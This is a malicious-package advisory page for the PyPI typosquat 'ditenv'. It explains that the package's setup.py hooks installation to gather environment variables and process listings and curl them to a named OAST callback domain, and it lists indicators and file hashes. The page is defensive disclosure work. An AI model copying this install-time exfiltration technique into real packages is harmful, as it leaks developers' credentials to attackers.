MAL-2026-6381
See a problem?- Import Source
- https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/ditenv/MAL-2026-6381.json
- JSON Data
- https://api.osv.dev/v1/vulns/MAL-2026-6381
- Published
- 2026-06-24T06:41:09Z
- Modified
- 2026-06-25T03:31:24.490012905Z
- Summary
- Malicious code in ditenv (PyPI)
- Details
-
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (f0a52dbba9abeff2c606bcbc862027da259fcbd3938c827abfdbdb06ba801ecb)
setup.py overrides the install and egginfo commands with a RunCommand() class that fires unconditionally on
pip installorpip download. The override reads the entire process environment viaos.environ, serializes every key=value pair, captures the output ofps -elf, and POSTs the combined payload over plaintext HTTP via curl to a hardcoded interactsh/OAST subdomain (gjampdwmdjmppwedtkpbbdkq05f6iiz6r.oast.fun). On developer machines and CI runners, the captured environment routinely contains AWSSECRETACCESSKEY, GHTOKEN, NPMTOKEN, PYPI_TOKEN, and similar credentials, all of which are leaked to an arbitrary attacker-controlled callback host. The package name is suggestive of adotenvtyposquat and the README self-identifies as a proof-of-concept; a comment claims the code is 'for research not for doing any harmful activity', but the cover story does not change the fact that any installer is subjected to live credential theft.Source: kam193 (6d0048d35301edad3a673cfd44c244a805586b25d3027758738aa8939099f1cc)
During installation, the package exfiltrates env variables
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-06-ip-rotat
Reasons (based on the campaign):
The package overrides the install command in setup.py to execute malicious code during installation.
exfiltration-env-variables
typosquatting
- Database specific
{ "iocs": { "domains": [ "gjampdwmdjmppwedtkpbbdkq05f6iiz6r.oast.fun" ] }, "malicious-packages-origins": [ { "sha256": "6d0048d35301edad3a673cfd44c244a805586b25d3027758738aa8939099f1cc", "import_time": "2026-06-24T07:47:34.49949455Z", "source": "kam193", "modified_time": "2026-06-24T06:41:09.531667Z", "versions": [ "0.0.1" ], "id": "pypi/2026-06-ip-rotat/ditenv" }, { "sha256": "f0a52dbba9abeff2c606bcbc862027da259fcbd3938c827abfdbdb06ba801ecb", "import_time": "2026-06-25T03:13:55.59686211Z", "source": "amazon-inspector", "modified_time": "2026-06-25T01:52:38Z", "versions": [ "0.0.1" ], "id": "IN-MAL-2026-007454" } ] }- References
- Credits
-
-
- Amazon Inspector - FINDER
-
- Kamil MaĆkowski (kam193) - REPORTER
-
Affected packages
PyPI / ditenv
Package
- Name
- ditenv
- View open source insights on deps.dev
- Purl
- pkg:pypi/ditenv
Database specific
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/ditenv/MAL-2026-6381.json"
cwes
[
{
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature.",
"cweId": "CWE-506"
}
]
indicators
{
"evidence_files": [
{
"sha256": "36f6db5f6abbdde271d1b8b35cfff8296b632161f6b560855aafc1eac934fce8",
"tlsh": "06316207e0bf19291ec344a0558f03959bc0e3a32f6431fab1fc29191f0b129113b8af",
"path": "setup.py"
},
{
"sha256": "15b4bdf3da6546bc391d6629e1b6a0fa9d17d037a275392dd16191ca312a51ed",
"tlsh": "6341873f8b9493341a211993355e62d4cb0f78bab6b184d47c7d09a5b217dae80333d2",
"path": "README.md"
}
],
"package_integrity": [
{
"filename": "ditenv-0.0.1-py3-none-any.whl",
"hashes": {
"sha256": "47e3f46d84b29815c49496ff52db72f8539a72b2dbc22281d763c705eedf222e",
"md5": "a0466995f12bc0b803d4b86f079a9880",
"blake2b_256": "1cf02d2c7ba7ec5203186db3de714deeecae54a19a0bbe88432c81c4ac1cc2fe"
}
},
{
"filename": "ditenv-0.0.1.tar.gz",
"hashes": {
"sha256": "7ce72def41d507c426f8c0460e2ad7af4eb5e7dfa9dcc6f4823ccea5448f289a",
"md5": "c9cfe54ecbfa2011c773fca517ac8e8a",
"blake2b_256": "0cb7b3a7b74888c551ef8e6317c199514ddff18bb215f906bc68ee67e9d7c921"
}
}
]
}